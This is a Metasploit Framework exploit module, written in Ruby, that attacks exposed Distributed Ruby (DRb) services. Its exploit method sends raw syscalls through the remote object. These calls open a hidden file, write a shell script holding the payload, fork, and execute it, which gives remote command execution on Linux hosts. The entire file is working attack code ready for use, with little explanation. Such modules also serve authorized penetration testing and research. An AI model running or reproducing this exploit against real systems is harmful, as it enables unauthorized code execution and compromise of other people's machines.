##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote

 def initialize(info = {})
  super(update_info(info, 
   'Name'           => 'Distributed Ruby send syscall vulnerability.',
   'Description'    => %q{ This module exploits remote syscalls in DRuby
   },
   'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
   'License'        => MSF_LICENSE,
   'Version'        => '',
   'References'     =>
    [
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Compat'      =>
      {
       'PayloadType' => 'cmd',
      },
     'Space'       => 32768,
    },
   'Platform'       => 'linux',
   'Arch'           => ARCH_ALL,
   'Targets'        => [[ 'Automatic', { }]],
   'DefaultTarget' => 0))

   
   register_options(
    [
     OptString.new('URI', [true, "The druby URI of the target host ", ""]),
    ], self.class)
 end

 def exploit
  serveruri = datastore['URI']
  DRb.start_service 
  p = DRbObject.new_with_uri(serveruri)
  class << p
   undef :send
  end
  filename = "." + Rex::Text.rand_text_alphanumeric(16)
  # syscall open
  i =  p.send(:syscall,8,filename,0700)
  #syscall write
  p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
  #syscall close
  p.send(:syscall,6,i)
  #syscall fork
  p.send(:syscall,2)
  #syscall execve
  p.send(:syscall,11,filename,0,0)
 
  handler(nil)
 end
end